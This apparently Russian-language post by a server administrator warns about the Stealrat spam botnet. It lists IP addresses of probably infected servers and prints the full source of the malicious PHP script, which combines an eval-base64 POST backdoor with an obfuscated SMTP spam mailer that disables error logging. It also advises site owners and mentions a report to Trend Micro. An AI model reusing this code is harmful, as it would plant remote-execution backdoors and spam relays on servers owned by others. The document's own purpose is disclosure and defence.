| 108.168.250.9 | 72 | US | United States | Dallas |
| 81.177.140.171 | 72 | RU | Russian Federation | |
| 92.53.113.36 | 72 | RU | Russian Federation | |
| 70.33.246.30 | 72 | CA | Canada | Oakville |
| 188.93.144.86 | 72 | NL | Netherlands | |
| 70.33.246.40 | 72 | CA | Canada | Oakville |
| 81.176.228.2 | 72 | RU | Russian Federation | |
| 77.222.42.176 | 60 | RU | Russian Federation | |
| 92.53.114.59 | 60 | RU | Russian Federation | |
| 199.116.78.5 | 60 | US | United States | Traverse City |
| 216.119.155.246 | 60 | US | United States | Atlanta |
| 176.57.209.92 | 60 | RU | Russian Federation | |
| 89.161.215.60 | 60 | PL | Poland | |
| 108.168.219.173 | 60 | US | United States | Dallas |
| 99.198.109.202 | 60 | US | United States | Chicago |
| 92.53.126.193 | 60 | RU | Russian Federation | |
| 2.81.128.216 | 48 | PT | Portugal | �gueda |
| 176.57.210.32 | 48 | RU | Russian Federation | |
| 85.13.139.125 | 48 | DE | Germany | |
| 92.53.98.156 | 48 | RU | Russian Federation | |
| 85.214.149.38 | 48 | DE | Germany | Berlin |
| 74.124.195.45 | 48 | US | United States | Los Angeles |
| 81.177.139.51 | 48 | RU | Russian Federation | |
| 92.53.112.194 | 48 | RU | Russian Federation | |
| 198.178.116.241 | 48 | CA | Canada | |
| 192.249.114.32 | 48 | US | United States | Los Angeles |
| 92.53.126.72 | 48 | RU | Russian Federation | |
| 92.53.112.21 | 48 | RU | Russian Federation | |
| 173.254.28.61 | 48 | US | United States | Provo |
| 92.53.125.30 | 48 | RU | Russian Federation | |
| 81.176.66.244 | 48 | RU | Russian Federation | |
| 65.99.239.227 | 48 | US | United States | Saint Louis |
| 37.140.192.56 | 48 | RU | Russian Federation | |
| 37.140.192.87 | 48 | RU | Russian Federation | |
| 190.107.17.66 | 36 | CO | Colombia | Pereira |
| 92.53.114.245 | 36 | RU | Russian Federation | |
| 37.140.192.71 | 36 | RU | Russian Federation | |
| 37.140.192.226 | 36 | RU | Russian Federation | |
| 81.177.141.101 | 36 | RU | Russian Federation | |
| 37.140.192.126 | 36 | RU | Russian Federation | |
| 37.140.192.32 | 36 | RU | Russian Federation | |
| 81.177.6.6 | 36 | RU | Russian Federation | |
| 205.234.140.231 | 36 | US | United States | Chicago |
| 81.177.141.32 | 36 | RU | Russian Federation | |
| 92.53.118.27 | 36 | RU | Russian Federation | |
| 37.140.192.63 | 36 | RU | Russian Federation | |
| 92.53.125.196 | 36 | RU | Russian Federation | |
| 168.144.144.36 | 36 | CA | Canada | Toronto |
| 69.175.71.50 | 36 | US | United States | Chicago |
| 79.96.147.100 | 36 | PL | Poland | |
| 195.210.29.11 | 36 | SK | Slovakia | |
| 91.197.230.12 | 36 | GB | United Kingdom | |
| 92.53.113.216 | 36 | RU | Russian Federation | |
| 81.177.139.181 | 36 | RU | Russian Federation | |
| 184.173.107.17 | 36 | US | United States | Houston |
| 212.113.145.195 | 36 | GB | United Kingdom | |
| 184.173.107.8 | 36 | US | United States | Houston |
| 31.31.196.35 | 36 | RU | Russian Federation | |
| 92.38.226.14 | 36 | RU | Russian Federation | |
| 92.53.98.191 | 36 | RU | Russian Federation | |
| 92.53.118.140 | 36 | RU | Russian Federation | |
| 207.58.154.27 | 24 | US | United States | Reston |
| 77.222.61.160 | 24 | RU | Russian Federation | |
| 192.185.82.247 | 24 | US | United States | Houston |
| 46.4.126.106 | 24 | DE | Germany | |
| 81.177.141.171 | 24 | RU | Russian Federation | |
| 178.254.9.65 | 24 | DE | Germany | |
| 92.53.114.3 | 24 | RU | Russian Federation | |
| 217.107.34.91 | 24 | RU | Russian Federation | |
| 37.140.192.128 | 24 | RU | Russian Federation | |
| 176.57.209.180 | 24 | RU | Russian Federation | |
| 92.53.96.161 | 24 | RU | Russian Federation | |
| 31.31.196.39 | 24 | RU | Russian Federation | |
| 176.9.7.149 | 24 | DE | Germany | |
| 79.170.44.106 | 24 | GB | United Kingdom | |
| 81.177.141.201 | 24 | RU | Russian Federation | |
| 81.177.141.161 | 24 | RU | Russian Federation | |
| 37.140.192.106 | 24 | RU | Russian Federation | |
| 81.177.6.72 | 24 | RU | Russian Federation | |
| 81.177.141.221 | 24 | RU | Russian Federation | |
| 81.177.135.151 | 24 | RU | Russian Federation | |
| 176.57.210.35 | 24 | RU | Russian Federation | |
| 176.57.216.2 | 24 | RU | Russian Federation | |
| 184.154.233.2 | 24 | US | United States | Chicago |
| 37.140.192.36 | 24 | RU | Russian Federation | |
| 76.74.242.200 | 24 | US | United States | New York |
| 91.197.228.150 | 24 | GB | United Kingdom | |
| 92.53.121.56 | 24 | RU | Russian Federation | |
| 81.177.140.71 | 24 | RU | Russian Federation | |
| 184.173.107.4 | 24 | US | United States | Houston |
| 176.57.216.90 | 24 | RU | Russian Federation | |
| 198.57.247.202 | 24 | US | United States | Provo |
| 192.185.176.225 | 24 | US | United States | Houston |
| 176.57.209.69 | 24 | RU | Russian Federation | |
| 37.140.192.110 | 24 | RU | Russian Federation | |
| 50.87.144.47 | 24 | US | United States | Provo |
| 92.53.112.82 | 24 | RU | Russian Federation | |
| 92.53.98.158 | 24 | RU | Russian Federation | |
| 81.95.96.178 | 24 | CZ | Czech Republic | Prague |
| 69.90.162.100 | 24 | CA | Canada | Oakville |
| 37.140.192.202 | 24 | RU | Russian Federation | |
| 37.140.192.9 | 24 | RU | Russian Federation | |
| 69.25.136.252 | 24 | US | United States | Atlanta |
| 37.140.192.80 | 24 | RU | Russian Federation | |
| 92.53.96.220 | 24 | RU | Russian Federation | |
| 185.21.133.101 | 24 | GB | United Kingdom | |
| 92.53.126.22 | 12 | RU | Russian Federation | |
| 72.47.209.127 | 12 | US | United States | Culver City |
| 81.177.139.21 | 12 | RU | Russian Federation | |
| 92.53.118.117 | 12 | RU | Russian Federation | |
| 192.185.83.110 | 12 | US | United States | Houston |
| 64.188.46.136 | 12 | US | United States | Chicago |
| 92.53.96.49 | 12 | RU | Russian Federation | |
| 67.227.167.68 | 12 | US | United States | Lansing |
| 92.53.121.68 | 12 | RU | Russian Federation | |
| 50.87.144.189 | 12 | US | United States | Provo |
| 50.87.144.38 | 12 | US | United States | Provo |
| 91.197.231.175 | 12 | GB | United Kingdom | |
| 81.177.140.11 | 12 | RU | Russian Federation | |
| 92.127.158.27 | 12 | RU | Russian Federation | |
| 79.96.63.38 | 12 | PL | Poland | |
| 212.85.108.205 | 12 | PL | Poland | |
| 92.53.96.89 | 12 | RU | Russian Federation | |
| 81.177.140.121 | 12 | RU | Russian Federation | |
| 89.161.164.194 | 12 | PL | Poland | |
| 192.185.83.227 | 12 | US | United States | Houston |
| 81.177.139.211 | 12 | RU | Russian Federation | |
| 188.93.212.44 | 12 | RU | Russian Federation | |
| 37.140.192.13 | 12 | RU | Russian Federation | |
| 92.53.96.29 | 12 | RU | Russian Federation | |
| 176.57.209.137 | 12 | RU | Russian Federation | |
| 217.107.34.41 | 12 | RU | Russian Federation | |
| 176.57.209.48 | 12 | RU | Russian Federation | |
| 92.53.125.54 | 12 | RU | Russian Federation | |
| 92.53.125.208 | 12 | RU | Russian Federation | |
| 92.53.96.47 | 12 | RU | Russian Federation | |
| 195.234.4.50 | 12 | UA | Ukraine | |
| 92.53.125.90 | 12 | RU | Russian Federation | |
| 81.177.140.64 | 12 | RU | Russian Federation | |
| 92.53.114.85 | 12 | RU | Russian Federation | |
| 91.106.203.85 | 12 | RU | Russian Federation | |
| 176.57.210.4 | 12 | RU | Russian Federation | |
| 81.177.141.191 | 12 | RU | Russian Federation | |
| 192.185.83.162 | 12 | US | United States | Houston |
| 81.177.139.111 | 12 | RU | Russian Federation | |
| 81.177.141.211 | 12 | RU | Russian Federation | |
| 91.218.228.154 | 12 | RU | Russian Federation | |
| 70.33.241.140 | 12 | US | United States | New York |
| 192.185.2.221 | 12 | US | United States | Houston |
| 193.183.99.171 | 12 | IT | Italy | Milan |
| 80.172.241.44 | 12 | PT | Portugal | |
| 37.140.192.238 | 12 | RU | Russian Federation | |
| 208.38.186.100 | 12 | US | United States | Naperville |
| 198.57.247.182 | 12 | US | United States | Provo |
| 81.177.140.221 | 12 | RU | Russian Federation | |
| 92.53.114.123 | 12 | RU | Russian Federation | |
| 213.183.63.3 | 12 | RU | Russian Federation | Moscow |
| 85.89.105.30 | 12 | RU | Russian Federation | |
| 81.177.139.11 | 12 | RU | Russian Federation | |
| 192.163.206.142 | 12 | US | United States | Provo |
| 192.185.4.59 | 12 | US | United States | Cedar Grove |
| 81.177.135.121 | 12 | RU | Russian Federation | |
| 85.158.183.141 | 12 | DE | Germany | |
| 92.38.226.13 | 12 | RU | Russian Federation | |
| 92.53.96.240 | 12 | RU | Russian Federation | |
| 217.107.219.191 | 12 | RU | Russian Federation | |
| 173.255.225.130 | 6 | US | United States | College Station |
| IP | Hits | Country Code | Country Name | City |
Кольцевая диаграмма по странам и количеству хитов
Исходный код вредоносного скрипта (PHP код выстроен но имена переменных и функций остались неизменными)
<?php eval(base64_decode($_POST['n8743bb']));?>
<?php
@error_reporting(0);
@ini_set(chr(101).chr(114).'ror_log',NULL);
@ini_set('log_errors',0);
if(count($_POST) < 2) {
die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321));
}
$SomeGlobalVar = false;
foreach (array_keys($_POST) as $v3c6e0b8a) {
switch ($v3c6e0b8a[0]) {
case chr(108):
$vd56b6998 = $v3c6e0b8a;
break;
case chr(100):
$v8d777f38 = $v3c6e0b8a;
break;
case chr(109):
$v3d26b0b1 = $v3c6e0b8a;
break;
case chr(101);
$SomeGlobalVar = true;
break;
}
}
if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321));
$v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
$v01b6e203 = @$_POST[$vd56b6998];
$v8d777f38 = @$_POST[$v8d777f38];
$v3d26b0b1 = @$_POST[$v3d26b0b1];
if ($SomeGlobalVar) {
$v01b6e203 = n9a2d8ce3($v01b6e203);
$v8d777f38 = n9a2d8ce3($v8d777f38);
$v3d26b0b1 = n9a2d8ce3($v3d26b0b1);
}
$v01b6e203 = urldecode(stripslashes($v01b6e203));
$v8d777f38 = urldecode(stripslashes($v8d777f38));
$v3d26b0b1 = urldecode(stripslashes($v3d26b0b1));
if (strpos($v01b6e203, '#',1) != false) {
$v16a9b63f = preg_split('/#/', $v01b6e203);
$ve2942a04 = count($v16a9b63f);
} else {
$v16a9b63f[0] = $v01b6e203;
$ve2942a04 = 1;
}
for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) {
$v01b6e203 = $v16a9b63f[$v865c0c0b];
if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1)) continue;
if (strpos($v01b6e203, ';', 1) != false) {
list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203));
$va3da707b = ucfirst($va3da707b);
$vbfbb12dc = ucfirst($vbfbb12dc);
$v3a5939e4 = next(explode('@', $v081bde0c));
if ($vbfbb12dc == '' || $va3da707b == '') {
$vbfbb12dc = $va3da707b = '';
$v01b6e203 = $v081bde0c;
} else {
$v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>";
}
} else {
$vbfbb12dc = $va3da707b = '';
$v081bde0c = strtolower($v01b6e203);
$v3a5939e4 = next(explode('@', $v01b6e203));
}
preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1);
$vee11cbb1 = $vee11cbb1[1];
preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c);
$vb068931c = $vb068931c[1];
preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9);
$vc34487c9 = $vc34487c9[1];
preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42);
$v6f4b5f42= $v6f4b5f42[1];
$vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9);
$vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9);
$v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42);
$v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42);
$v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
if (ne667da76($v0897acf4) || @ini_get('safe_mode'))
$v10497e3f = false;
else
$v10497e3f = true;
$v9a5cb5d8 = "$vee11cbb1@$v0897acf4";
if ($vb068931c != '')
$vd98a07f8 = "$vb068931c <$v9a5cb5d8>";
else
$vd98a07f8 = $v9a5cb5d8;
$vb8ddc93f = "From: $vd98a07f8\r\n";
$vb8ddc93f .= "Reply-To: $vd98a07f8\r\n";
$v3c87b187 = "X-Priority: 3 (Normal)\r\n";
$v3c87b187 .= "MIME-Version: 1.0\r\n";
$v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
$v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n";
$v1e66f6b4 = 'ma'.chr(105).'l';
if (!in_array('m'.'a'.'il', $v619d75f8)) {
if ($v10497e3f) {
if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) {
echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue;
}
} else {
if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) {
echo(chr(79).chr(75).md5(1234567890)."+0\n");
continue;
}
}
}
$v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f;
$v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n";
$v4340fd73 .= "To: $v01b6e203\r\n";
$v4340fd73 .= "Subject: $vc34487c9\r\n";
$v4340fd73 .= $v3c87b187;
$v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42;
if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4);
if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) {
echo(chr(79).chr(75).md5(1234567890)."+1\n");
continue;
} else {
echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417\n";
}
}
function ne667da76($v957b527b){
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b);
}
function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) {
$vf5a8e923 = strlen($vb45cffe0);
$vb4a88417 = '';
for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) {
if ($v11a95b8a >= 75) {
$v11a95b8a = $v92f21a0f;
$vb4a88417 .= $v7fa1b685;
}
$v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]);
if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
$vb4a88417.=chr($v4a8a08f0);
$v11a95b8a = 0;
continue;
}
$vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
$v11a95b8a += 3;
continue;
}
$vb4a88417 .= chr($v4a8a08f0);
$v11a95b8a++;
}
return $vb4a88417;
}
function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) {
global $v619d75f8;
if (!in_array('fsockopen', $v619d75f8))
$v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
elseif (!in_array('pfsockopen', $v619d75f8))
$v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client"))
$v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20);
else
return -1;
if (!$v66b18866) {
return 1;
} else {
$v8d777f38 = n54070395($v66b18866);
@fputs($v66b18866, "EHLO $v0897acf4\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250 )
return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250 )
return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251)
return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "DATA\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 354 )
return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, $v841a2d68."\r\n.\r\n");
$ve98d2f00 = n54070395($v66b18866);
if (substr($ve98d2f00, 0, 3) != 250 )
return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
@fputs($v66b18866, "QUIT\r\n");
@fclose($v66b18866);
return 0;
}
}
function n54070395($v66b18866) {
$v8d777f38 = '';
while($v341be97d = @fgets($v66b18866, 4096)) {
$v8d777f38 .= $v341be97d;
if(substr($v341be97d, 3, 1) == ' ') break;
}
return $v8d777f38;
}
function n9c812bad($vad5f82e8) {
global $v619d75f8;
if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) {
@getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816);
if (count($v744fa43b) === 0)
return '127.0.0.1';
$v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816));
return $v744fa43b[$v865c0c0b[0]];
} else {
return '127.0.0.1';
}
}
function n9a2d8ce3($v1cb251ec) {
$v1cb251ec = base64_decode($v1cb251ec);
$vc68271a6 = '';
for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++)
$vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2);
return $vc68271a6;
}
?>
Посмотрите на список IP адресов, возможно IP вашего сервера в этом списке. Если да, попытайтесь локализовать проблему самостоятельно. Если у вас обычный виртуальный хостинг — напишите вашему хостеру, что у соседей сидит вот такая зараза под именем Stealrat. Мы не знаем что дальше делать, проблема то локализована и дырки все закрыты но запросы идут постоянно. Список уникальных IP пополняется и пополняется. Нагрузки на сервер никакой нет, но само только знание того что такое творится и в таком количестве… Кто его знает куда писать и как предупредить всех владельцев данных IP. Может быть кто то из вас подскажет.
Написали письмо в trendmicro с вопросом что делать с этим списком IP адресов. Возможно подскажут а возможно и нет. Возможно есть какой то сервис, в который можно добавлять зараженные IP или что то подобное.
Спасибо за внимание, удачи вам, берегите свои сервера.
Update 1. Выборка всех зараженных сайтов из логов (с тела спам сообщения)
В табличке домен и IP сервера. Список уникализирован по доменам.
Список (4705)
Update 2. Дополнительная выборка доменов (hostname)
В табличке домен и IP сервера. Список уникализирован по доменам.
Большое спасибо пользователю xaker1 за предоставленный список.
Список (1223)
